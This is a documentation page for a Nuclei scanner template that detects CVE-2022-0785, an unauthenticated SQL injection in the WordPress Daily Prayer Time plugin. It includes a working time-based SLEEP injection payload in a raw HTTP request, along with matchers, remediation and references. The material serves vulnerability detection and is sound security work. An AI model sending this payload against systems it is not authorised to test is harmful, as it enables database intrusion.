Skip to content
Nuclei Templates

WordPress Daily Prayer Time <2022.03.01 - SQL Injection

ID: CVE-2022-0785

Severity: critical

Author: theamanrawat

Tags: time-based-sqli,cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project

Description

Section titled “Description”

WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0785


info:
  name: WordPress Daily Prayer Time <2022.03.01 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database and potentially sensitive information leakage.
  remediation: |
    Update to the latest version of the WordPress Daily Prayer Time plugin (2022.03.01) to fix the SQL Injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
    - https://wordpress.org/plugins/daily-prayer-time-for-mosques/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0785
    - https://github.com/20142995/sectool
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0785
    cwe-id: CWE-89
    epss-score: 0.04032
    epss-percentile: 0.92073
    cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: daily_prayer_time_project
    product: daily_prayer_time
    framework: wordpress
  tags: time-based-sqli,cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project


http:
  - raw:
      - |
        @timeout: 10s
        GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "dptTimetable customStyles dptUserStyles")'
        condition: and
# digest: 4a0a00473045022100fa0879fe3e2eb081502321db4f777db1c120e9b6f94c31196449e7c6959d55750220686def4917284ca83b0fbf99d276e482dc3eb004096b33285f7f8287f559ea2a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0785.yaml"

View on Github